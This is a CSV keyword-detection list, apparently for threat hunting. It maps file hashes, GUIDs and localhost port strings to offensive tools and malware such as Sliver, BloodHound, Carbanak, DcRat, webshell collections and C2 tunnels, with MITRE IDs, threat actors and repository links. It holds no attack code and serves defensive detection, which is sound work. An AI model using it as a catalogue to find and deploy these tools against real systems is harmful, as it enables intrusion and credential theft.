"*11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975*",".{0,1000}11db72b2a60d5be74d95f4a311571f045086efef145562edf02046d97f44f975.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21995"
"*11ddcce3f411ffc78725cd4487998eb819324a19a502cd86852c9d8e2cc9659d*",".{0,1000}11ddcce3f411ffc78725cd4487998eb819324a19a502cd86852c9d8e2cc9659d.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","21996"
"*11eebffcb6a3eb53339bb8e36b8962e7998c596338be5ff8ebf73e46753ca393*",".{0,1000}11eebffcb6a3eb53339bb8e36b8962e7998c596338be5ff8ebf73e46753ca393.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21997"
"*11ef63b9bc33b0da6d0b5593e55e460aa8aa8279eb9ad4b90a4dc2b722ffa6e1*",".{0,1000}11ef63b9bc33b0da6d0b5593e55e460aa8aa8279eb9ad4b90a4dc2b722ffa6e1.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","21998"
"*11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3*",".{0,1000}11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22001"
"*11f51e1a8f1a630390533599cfbcb78133d680f6*",".{0,1000}11f51e1a8f1a630390533599cfbcb78133d680f6.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","22002"
"*11f78d1a820ec352029004223dc0de3470f7b9f8850b3bda75854a34b2551811*",".{0,1000}11f78d1a820ec352029004223dc0de3470f7b9f8850b3bda75854a34b2551811.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#filehash","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","22004"
"*11f87919942c811549a9c15b8647d26639becdc0feb75c43c87aa542d64e0552*",".{0,1000}11f87919942c811549a9c15b8647d26639becdc0feb75c43c87aa542d64e0552.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22005"
"*11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203*",".{0,1000}11fcbd067d55ddaa11e622be03a55ea342efe497cbcb14abf4dc410cb5d7a203.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","#filehash","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","22006"
"*12019e8fbf5e9de4d96c87be2e5e160fc2e51faef14a3fe68561523858ab6511*",".{0,1000}12019e8fbf5e9de4d96c87be2e5e160fc2e51faef14a3fe68561523858ab6511.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22007"
"*12049959488b4cd94238371564597e57b04fcab7a194972b6c66f1ee1fc8ad2d*",".{0,1000}12049959488b4cd94238371564597e57b04fcab7a194972b6c66f1ee1fc8ad2d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22008"
"*120ebb7f608e411010824805482f682059e9089a8c8a0ca44ff48e69f8ebd64b*",".{0,1000}120ebb7f608e411010824805482f682059e9089a8c8a0ca44ff48e69f8ebd64b.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","22010"
"*120edd37142c24d17472137c608220220a4efb595d42a991efd498ac30339b4e*",".{0,1000}120edd37142c24d17472137c608220220a4efb595d42a991efd498ac30339b4e.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","22011"
"*12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b*",".{0,1000}12139d47846b3be4267cb079cd73db336c938f111880e23a2f21d19b75921c7b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22013"
"*121a8382a9b50c51ffe0269efc4db9fafee9cb7dc1afe5ea5318b2d2439b22c7*",".{0,1000}121a8382a9b50c51ffe0269efc4db9fafee9cb7dc1afe5ea5318b2d2439b22c7.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","22016"
"*121b6cc756d066cd5581f54215db3faf5edb5ff02697421cd38b6f93d6d5d65b*",".{0,1000}121b6cc756d066cd5581f54215db3faf5edb5ff02697421cd38b6f93d6d5d65b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22017"
"*121e18a8ad050f1a9510c6c32c0f4bb9adac3436170e2d1966788da4dc14c751*",".{0,1000}121e18a8ad050f1a9510c6c32c0f4bb9adac3436170e2d1966788da4dc14c751.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","22018"
"*1227072f7b3532300b6c991a88b1faaa472cd0cc214d0c2b5f2ae3dec5c2f922*",".{0,1000}1227072f7b3532300b6c991a88b1faaa472cd0cc214d0c2b5f2ae3dec5c2f922.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22020"
"*1228965bfca9be58b2370874d794ce293238ef8a7faa1f6c744374300aa8a79d*",".{0,1000}1228965bfca9be58b2370874d794ce293238ef8a7faa1f6c744374300aa8a79d.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","#filehash","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","22021"
"*123abcbde966780cef8d9ec24523acac*",".{0,1000}123abcbde966780cef8d9ec24523acac.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","22024"
"*12478b22d1d04c87d681a635c8e31745119c25d50bf344f6ed9d8a4cb65e96c5*",".{0,1000}12478b22d1d04c87d681a635c8e31745119c25d50bf344f6ed9d8a4cb65e96c5.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22026"
"*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*",".{0,1000}124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","22027"
"*1250BAE1-D26F-4EF2-9452-9B5009568336*",".{0,1000}1250BAE1\-D26F\-4EF2\-9452\-9B5009568336.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","22028"
"*12545d5c24427a6dc3e63d63472bb344ad1d67f323756f1430b48ae2acdf322d*",".{0,1000}12545d5c24427a6dc3e63d63472bb344ad1d67f323756f1430b48ae2acdf322d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22030"
"*1256b5cd8907a87eaeb5990075115f93058f4779f348718f7ebf3958a006ecdf*",".{0,1000}1256b5cd8907a87eaeb5990075115f93058f4779f348718f7ebf3958a006ecdf.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22031"
"*1257077a68f9725d863947e0931a44727fceaad6565b73b9f8d873cc3d028e00*",".{0,1000}1257077a68f9725d863947e0931a44727fceaad6565b73b9f8d873cc3d028e00.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","#filehash","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","22032"
"*125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7*",".{0,1000}125d5bee94f4a04a39b54ec1bcccb5256e0f34abc0ac991af803b1dc525cfbd7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22033"
"*125d8d5718d5ac71f5548f2961980df14595e230c66a5fceada29a7f74af340b*",".{0,1000}125d8d5718d5ac71f5548f2961980df14595e230c66a5fceada29a7f74af340b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22034"
"*125dadd033118d08acc7a70074c1174e99353c1634083609a27c11d7a4131a56*",".{0,1000}125dadd033118d08acc7a70074c1174e99353c1634083609a27c11d7a4131a56.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22035"
"*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*",".{0,1000}127\.0\.0\.1\sis\snot\sadvisable\sas\sa\ssource\.\sUse\s\-l\s127\.0\.0\.1\sto\soverride\sthis\swarning.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","22037"
"*127.0.0.1/backdoored*",".{0,1000}127\.0\.0\.1\/backdoored.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","22038"
"*127.0.0.1/C$/Windows/System32/utilman.exe*",".{0,1000}127\.0\.0\.1\/C\$\/Windows\/System32\/utilman\.exe.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","22039"
"*127.0.0.1/KingDefacer*",".{0,1000}127\.0\.0\.1\/KingDefacer.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22040"
"*127.0.0.1/pipe/coerced\\C$*",".{0,1000}127\.0\.0\.1\/pipe\/coerced\\\\C\$.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","22041"
"*127.0.0.1/r57shell*",".{0,1000}127\.0\.0\.1\/r57shell.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22042"
"*127.0.0.1:#{mitm_port}*",".{0,1000}127\.0\.0\.1\:\#\{mitm_port\}.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","22043"
"*127.0.0.1:1080*",".{0,1000}127\.0\.0\.1\:1080.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","22044"
"*127.0.0.1:1337*",".{0,1000}127\.0\.0\.1\:1337.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","22045"
"*127.0.0.1:1337*",".{0,1000}127\.0\.0\.1\:1337.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","1","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","22046"
"*127.0.0.1:2222*",".{0,1000}127\.0\.0\.1\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","22047"
"*127.0.0.1:31337*",".{0,1000}127\.0\.0\.1\:31337.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","22048"
"*127.0.0.1:4567*",".{0,1000}127\.0\.0\.1\:4567.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","22049"
"*127.0.0.1:53531*",".{0,1000}127\.0\.0\.1\:53531.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","N/A","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","22050"
"*127.0.0.1:5555*",".{0,1000}127\.0\.0\.1\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","22051"
"*127.0.0.1:7777*",".{0,1000}127\.0\.0\.1\:7777.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","22052"
"*127.0.0.1:8022*",".{0,1000}127\.0\.0\.1\:8022.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","22053"
"*127.0.0.1:8118*",".{0,1000}127\.0\.0\.1\:8118\:8118.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","privproxy port also web panel for victims","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","22054"
"*127.0.0.1:8848*",".{0,1000}127\.0\.0\.1\:8848.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22055"
"*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","22056"
"*127.0.0.1:9050*",".{0,1000}127\.0\.0\.1\:9050.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","22057"
"*1270518f941a14c009fc80622178f1713c7bacb88ee0396e0d858454f04cff63*",".{0,1000}1270518f941a14c009fc80622178f1713c7bacb88ee0396e0d858454f04cff63.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22058"
"*127449a2c9bac7f318aaf2ea709c7006875ddb4be79448f3f02db624e15a6540*",".{0,1000}127449a2c9bac7f318aaf2ea709c7006875ddb4be79448f3f02db624e15a6540.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22059"
"*127a7893890a5bbe661beaab8ecd27a565ef636c890cec15544480836f161a94*",".{0,1000}127a7893890a5bbe661beaab8ecd27a565ef636c890cec15544480836f161a94.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22060"
"*127f1bfca312fa054a6e761df8c330967ed93dbe80ca78357e9b727faea0c5ef*",".{0,1000}127f1bfca312fa054a6e761df8c330967ed93dbe80ca78357e9b727faea0c5ef.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","22062"
